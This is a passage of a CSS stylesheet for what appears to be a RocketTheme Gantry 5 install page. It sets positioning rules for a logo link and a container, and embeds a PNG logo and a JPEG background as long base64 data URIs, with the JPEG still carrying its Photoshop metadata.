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');
        width: 160px;
        height: 35px;
        background-repeat: no-repeat;
        position: absolute;
        bottom: 5px;
        right: 5px;
        background-size: contain;
    }

    .g5i .g5-rockettheme a {
        display: block;
        position: absolute;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        font-size: 0;
    }

    /* container */
    .g5i {
        position: relative;
        margin: 15px 15px 15px -15px;
        background: url('data:image/jpeg;base64,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T3B0aW9ucwAAABcAAAAAQ3B0bmJvb2wAAAAAAENsYnJib29sAAAAAABSZ3NNYm9vbAAAAAAAQ3JuQ2Jvb2wAAAAAAENudENib29sAAAAAABMYmxzYm9vbAAAAAAATmd0dmJvb2wAAAAAAEVtbERib29sAAAAAABJbnRyYm9vbAAAAAAAQmNrZ09iamMAAAABAAAAAAAAUkdCQwAAAAMAAAAAUmQgIGRvdWJAb+AAAAAAAAAAAABHcm4gZG91YkBv4AAAAAAAAAAAAEJsICBkb3ViQG/gAAAAAAAAAAAAQnJkVFVudEYjUmx0AAAAAAAAAAAAAAAAQmxkIFVudEYjUmx0AAAAAAAAAAAAAAAAUnNsdFVudEYjUHhsQFIAAAAAAAAAAAAKdmVjdG9yRGF0YWJvb2wBAAAAAFBnUHNlbnVtAAAAAFBnUHMAAAAAUGdQQwAAAABMZWZ0VW50RiNSbHQAAAAAAAAAAAAAAABUb3AgVW50RiNSbHQAAAAAAAAAAAAAAABTY2wgVW50RiNQcmNAWQAAAAAAAAAAABBjcm9wV2hlblByaW50aW5nYm9vbAAAAAAOY3JvcFJlY3RCb3R0b21sb25nAAAAAAAAAAxjcm9wUmVjdExlZnRsb25nAAAAAAAAAA1jcm9wUmVjdFJpZ2h0bG9uZwAAAAAAAAALY3JvcFJlY3RUb3Bsb25nAAAAAAA4QklNA+0AAAAAABAASAAAAAEAAgBIAAAAAQACOEJJTQQmAAAAAAAOAAAAAAAAAAAAAD+AAAA4QklNBA0AAAAAAAQAAAAeOEJJTQQZAAAAAAAEAAAAHjhCSU0D8wAAAAAACQAAAAAAAAAAAQA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9mZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4AAAAAABwAAD/////////////////////////////A+gAAAAA/////////////////////////////wPoAAAAAP////////////////////////////8D6AAAAAD/////////////////////////////A+gAADhCSU0EAAAAAAAAAgALOEJJTQQCAAAAAAAaAAAA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MTEgNjYuMTQ1NjYxLCAyMDEyLzAyLzA2LTE0OjU2OjI3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1wTU06RG9jdW1lbnRJRD0iMzBFNkZFNEQ5OUZCQjA4OTI0NTY3MURCNTY1RDU3MjYiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NjkwMEQ0MkM0MTY4RTYxMTk0NzlBNjU0NTQzRkRFN0MiIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0iMzBFNkZFNEQ5OUZCQjA4OTI0NTY3MURCNTY1RDU3MjYiIGRjOmZvcm1hdD0iaW1hZ2UvanBlZyIgcGhvdG9zaG9wOkNvbG9yTW9kZT0iMyIgeG1wOkNyZWF0ZURhdGU9IjIwMTYtMDgtMjJUMTE6MDE6MzQrMDM6MDAiIHhtcDpNb2RpZnlEYXRlPSIyMDE2LTA4LTIyVDExOjI1OjQ0KzAzOjAwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDE2LTA4LTIyVDExOjI1OjQ0KzAzOjAwIj4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NjgwMEQ0MkM0MTY4RTYxMTk0NzlBNjU0NTQzRkRFN0MiIHN0RXZ0OndoZW49IjIwMTYtMDgtMjJUMTE6MjU6NDQrMDM6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCBDUzYgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo2OTAwRDQyQzQxNjhFNjExOTQ3OUE2NTQ1NDNGREU3QyIgc3RFdnQ6d2hlbj0iMjAxNi0wOC0yMlQxMToyNTo0NCswMzowMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPC9yZGY6U2VxPiA8L3htcE1NOkhpc3Rvcnk+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDw/eHBhY2tldCBlbmQ9InciPz7/7gAhQWRvYmUAZAAAAAABAwAQAwIDBgAAAAAAAAAAAAAAAP/bAIQABgQEBAUEBgUFBgkGBQYJCwgGBggLDAoKCwoKDBAMDAwMDAwQDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAEHBwcNDA0YEBAYFA4ODhQUDg4ODhQRDAwMDAwREQwMDAwMDBEMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8IAEQgBkQSAAwERAAIRAQMRAf/EAOkAAQEBAQADAQAAAAAAAAAAAAABAgMEBgcFAQEBAQADAQEBAAAAAAAAAAAAAQIDBAUGCAcQAAEDAwMEAgECBgICAwAAAAEAEQIQIDASAwRAUDEFIQYzMhNgIzQ1NgdBIhQVcCQmEQABAQQDCwgIAgkFAAAAAAABAgARIQNQMQQQIDBAQVFhcRIismCBkaEychNzscHRQlKCIwVwYuGSosIzU7MUNIDw4mN0EgABAQQDDQUGAwkAAAAAAAABAgAQIBEhsgNgcPAxQXGBEi